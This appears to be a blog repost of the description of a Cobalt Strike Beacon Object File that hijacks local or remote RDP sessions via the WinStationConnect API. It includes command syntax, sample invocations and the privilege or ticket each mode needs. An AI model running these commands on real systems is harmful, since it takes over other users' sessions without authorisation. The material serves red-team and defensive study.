Wednesday, November 9, 2022

BOF – Cobalt Strike Beacon Object File (BOF) That Uses the WinStationConnect API To Perform Local/Remote RDP Session Hijacking




Cobalt Strike Beacon Object File (BOF) that uses the WinStationConnect API to perform local/remote RDP session hijacking. With a valid access token / Kerberos ticket (e.g., golden ticket) of the session owner, you will be able to hijack the session remotely without dropping any beacon/tool on the target server.

To enumerate sessions locally/remotely, you can use Quser-BOF.

Usage

Usage: bof-rdphijack [your console session id] [target session id to hijack] [password|server] [argument]

Command Description
-------- -----------
password Specifies the password of the user who owns the session to which you want to connect.
server Specifies the remote server on which you want to perform RDP hijacking.

Sample usage
--------
Redirect session 2 to session 1 (requires SYSTEM privilege):
bof-rdphijack 1 2

Redirect session 2 to session 1 with the password of the user who owns session 2 (requires a high-integrity beacon):
bof-rdphijack 1 2 password [email protected]

Redirect session 2 to session 1 on a remote server (requires a token/ticket of the user who owns session 2):
bof-rdphijack 1 2 server SQL01.lab.inside

Compile

make

Reference

tscon.exe


